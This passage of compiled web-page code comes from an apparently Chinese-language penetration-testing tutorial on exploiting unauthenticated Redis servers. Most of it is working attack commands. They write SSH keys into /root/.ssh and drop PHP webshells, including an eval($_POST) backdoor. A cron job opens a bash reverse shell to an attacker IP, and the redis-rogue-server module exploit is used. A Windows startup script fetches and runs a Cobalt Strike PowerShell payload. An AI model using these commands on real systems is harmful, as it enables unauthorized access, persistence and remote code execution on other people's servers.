number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dir "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),s._v("root"),e("span",{pre:!0,attrs:{class:"token 
operator"}},[s._v("/")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("ssh\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dbfilename authorized_keys\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" keys "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("*")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("1")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"test"')]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" get test\n"),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"\\n\\n\\nssh-rsa xxxxxxxxxxxx \\n\\n\\n\\n"')]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token 
number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" save\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" \n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br"),e("span",{staticClass:"line-number"},[s._v("9")]),e("br"),e("span",{staticClass:"line-number"},[s._v("10")]),e("br"),e("span",{staticClass:"line-number"},[s._v("11")]),e("br"),e("span",{staticClass:"line-number"},[s._v("12")]),e("br"),e("span",{staticClass:"line-number"},[s._v("13")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1030),alt:"img"}})]),s._v(" "),e("ul",[e("li",[s._v("✅如上则为成功写入SSH密钥文件,攻击机可无需密码远程连接目标主机SSH")])]),s._v(" "),e("h3",{attrs:{id:"webshell"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#webshell"}},[s._v("#")]),s._v(" WebShell")]),s._v(" "),e("p",[s._v("当SSH不允许远程登录时,也可以通过写入 Web目录控制目标主机")]),s._v(" 
"),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v('┌──(root💀kali)-[~/.ssh]\n└─# redis-cli -h 192.168.0.126 -p 6379\n192.168.0.126:6379> config set dir /var/www/html\nOK\n192.168.0.126:6379> config set dbfilename xxx.php\nOK\n192.168.0.126:6379> set web "\\r\\n\\r\\n'),e("span",{pre:!0,attrs:{class:"token php language-php"}},[e("span",{pre:!0,attrs:{class:"token delimiter important"}},[s._v("<?php")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token function"}},[s._v("phpinfo")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(";")]),e("span",{pre:!0,attrs:{class:"token delimiter important"}},[s._v("?>")])]),s._v('\\r\\n\\r\\n"\nOK\n192.168.0.126:6379> save\nOK\n')])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br"),e("span",{staticClass:"line-number"},[s._v("9")]),e("br"),e("span",{staticClass:"line-number"},[s._v("10")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1031),alt:"img"}})]),s._v(" "),e("h3",{attrs:{id:"定时任务"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#定时任务"}},[s._v("#")]),s._v(" 定时任务")]),s._v(" "),e("p",[s._v("也可以通过写入定时任务反弹Shell,获取权限")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("攻击机监听端口 ")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("nc -lvvp 9999")]),e("br"),s._v(" "),e("div",{staticClass:"language-php 
line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" set test2 "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"\\n\\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.0.140/9999 0>&1\\n\\n"')]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dir "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),e("span",{pre:!0,attrs:{class:"token keyword"}},[s._v("var")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),s._v("spool"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),s._v("cron\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dbfilename root\n"),e("span",{pre:!0,attrs:{class:"token 
constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" save\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" \n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br"),e("span",{staticClass:"line-number"},[s._v("9")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1032),alt:"img"}})]),s._v(" "),e("h3",{attrs:{id:"主从复制"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#主从复制"}},[s._v("#")]),s._v(" 主从复制")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("如果当把数据存储在单个Redis的实例中,当读写体量比较大的时候,服务端就很难承受。")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("为了应对这种情况,Redis就提供了主从模式,主从模式就是指使用一个redis实例作为主机,其他实例都作为备份机")]),e("br"),s._v(" 
"),e("a-checkbox",{attrs:{checked:""}},[s._v("其中主机和从机数据相同,而从机只负责读,主机只负责写,通过读写分离可以大幅度减轻流量的压力,算是一种通过牺牲空间来换取效率的缓解方式")]),e("br"),s._v(" "),e("p",[s._v("Redis未授权访问在4.x/5.0.5以前版本,我们可以使用主/从模式加载远程模块,通过动态链接库的方式执行任意命令。")]),s._v(" "),e("p",[s._v("关于漏洞原理请查看"),e("a",{attrs:{href:"https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf",target:"_blank",rel:"noopener noreferrer"}},[s._v("Pavel Toporkov的分享"),e("OutboundLink")],1)]),s._v(" "),e("p",[s._v("漏洞利用脚本: "),e("a",{attrs:{href:"https://github.com/n0b0dyCN/redis-rogue-server",target:"_blank",rel:"noopener noreferrer"}},[s._v("n0b0dyCN/redis-rogue-server"),e("OutboundLink")],1)]),s._v(" "),e("div",{staticClass:"language-shell line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-shell"}},[e("code",[s._v("➜ ./redis-rogue-server.py -h\n______ _ _ ______ _____ \n"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" ___ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" ___ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" / ___"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" \n"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("_/ /___ __"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("_ ___ "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("_/ /___ __ _ _ _ ___ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" 
"),e("span",{pre:!0,attrs:{class:"token variable"}},[e("span",{pre:!0,attrs:{class:"token variable"}},[s._v("`")]),s._v("--. ___ _ ____ _____ _ __ \n"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" // _ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("/ _"),e("span",{pre:!0,attrs:{class:"token variable"}},[s._v("`")])]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" / __"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" // _ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" / _"),e("span",{pre:!0,attrs:{class:"token variable"}},[e("span",{pre:!0,attrs:{class:"token variable"}},[s._v("`")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("/ _ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token variable"}},[s._v("`")])]),s._v("--. 
"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("/ _ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token string"}},[s._v("'__\\ \\ / / _ \\ '")]),s._v("__"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" __/ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("__ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" __/ /"),e("span",{pre:!0,attrs:{class:"token 
punctuation"}},[s._v("\\")]),s._v("__/ / __/ "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" V / __/ "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" \n"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("___"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("__,_"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("___/ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("___/ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("__, "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("__,_"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("___"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("____/ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("___"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("_/ 
"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("___"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" \n __/ "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" \n "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("___/ \n@copyright n0b0dy @ r3kapig\n\nUsage: redis-rogue-server.py "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("[")]),s._v("options"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("]")]),s._v("\n\nOptions:\n -h, --help show this "),e("span",{pre:!0,attrs:{class:"token builtin class-name"}},[s._v("help")]),s._v(" message and "),e("span",{pre:!0,attrs:{class:"token builtin class-name"}},[s._v("exit")]),s._v("\n --rhost"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("REMOTE_HOST target "),e("span",{pre:!0,attrs:{class:"token function"}},[s._v("host")]),s._v("\n --rport"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("REMOTE_PORT target redis port, default "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),s._v("\n --lhost"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("LOCAL_HOST rogue server "),e("span",{pre:!0,attrs:{class:"token function"}},[s._v("ip")]),s._v("\n --lport"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("LOCAL_PORT rogue server listen port, default "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("21000")]),s._v("\n --exp"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("EXP_FILE Redis Module to load, default exp.so\n -v, --verbose Show full data stream\nExample\n")])]),s._v(" 
"),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br"),e("span",{staticClass:"line-number"},[s._v("9")]),e("br"),e("span",{staticClass:"line-number"},[s._v("10")]),e("br"),e("span",{staticClass:"line-number"},[s._v("11")]),e("br"),e("span",{staticClass:"line-number"},[s._v("12")]),e("br"),e("span",{staticClass:"line-number"},[s._v("13")]),e("br"),e("span",{staticClass:"line-number"},[s._v("14")]),e("br"),e("span",{staticClass:"line-number"},[s._v("15")]),e("br"),e("span",{staticClass:"line-number"},[s._v("16")]),e("br"),e("span",{staticClass:"line-number"},[s._v("17")]),e("br"),e("span",{staticClass:"line-number"},[s._v("18")]),e("br"),e("span",{staticClass:"line-number"},[s._v("19")]),e("br"),e("span",{staticClass:"line-number"},[s._v("20")]),e("br"),e("span",{staticClass:"line-number"},[s._v("21")]),e("br"),e("span",{staticClass:"line-number"},[s._v("22")]),e("br")])]),e("div",{staticClass:"language-shell line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-shell"}},[e("code",[s._v("python3 redis-rogue-server.py --rhost "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),s._v(".51.146 --lhost "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),s._v(".51.146 --exp"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("exp.so\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1033),alt:"img"}})]),s._v(" 
"),e("p",[e("img",{attrs:{src:a(1034),alt:"img"}})]),s._v(" "),e("h2",{attrs:{id:"windows-获取权限"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#windows-获取权限"}},[s._v("#")]),s._v(" Windows 获取权限")]),s._v(" "),e("h3",{attrs:{id:"webshell-2"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#webshell-2"}},[s._v("#")]),s._v(" Webshell")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("攻击成功的前提为:需要准确的知道Web目录位置")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("可通过 phpinfo 或者 网站报错得知")]),e("br"),s._v(" "),e("p",[e("img",{attrs:{src:a(1035),alt:"img"}})]),s._v(" "),e("p",[s._v("这里测试的目标路径为:"),e("code",[s._v("C:\\phpstudy_pro\\WWW")])]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v('192.168.0.123:6379> config set dir C:\\phpstudy_pro\\WWW\nOK\n192.168.0.123:6379> config set dbfilename shell.php\nOK\n192.168.0.123:6379> set test "'),e("span",{pre:!0,attrs:{class:"token php language-php"}},[e("span",{pre:!0,attrs:{class:"token delimiter important"}},[s._v("<?php")]),s._v(" @"),e("span",{pre:!0,attrs:{class:"token keyword"}},[s._v("eval")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),e("span",{pre:!0,attrs:{class:"token variable"}},[s._v("$_POST")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("[")]),e("span",{pre:!0,attrs:{class:"token string single-quoted-string"}},[s._v("'shell'")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("]")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),e("span",{pre:!0,attrs:{class:"token delimiter important"}},[s._v("?>")])]),s._v('"\nOK\n192.168.0.123:6379> save\nOK\n')])]),s._v(" 
"),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1036),alt:"img"}})]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("成功写入木马,并可连接控制服务器")]),e("br"),s._v(" "),e("p",[e("img",{attrs:{src:a(1037),alt:"img"}})]),s._v(" "),e("h3",{attrs:{id:"启动项"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#启动项"}},[s._v("#")]),s._v(" 启动项")]),s._v(" "),e("p",[s._v("攻击方法与写入Linux启动项相似")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("需要高权限账户")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("Windows 启动项目录为:")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp")]),e("br"),s._v(" "),e("p",[s._v("首先创建 CobaltStrike监听")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("`Attacks -> Web Drive-By -> Script Web Delivery`")]),e("br"),s._v(" "),e("p",[e("img",{attrs:{src:a(1038),alt:"img"}})]),s._v(" "),e("p",[s._v("生成 Powershell 语句")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("powershell"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("exe "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("nop "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("w hidden "),e("span",{pre:!0,attrs:{class:"token 
operator"}},[s._v("-")]),s._v("c "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v("\"IEX ((new-object net.webclient).downloadstring('http://192.168.0.126:6666/a'))\"")]),s._v("\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[s._v("执行Redis命令写入语句")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".123")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dir "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp/"')]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".123")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dbfilename cmd"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("bat\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".123")]),e("span",{pre:!0,attrs:{class:"token 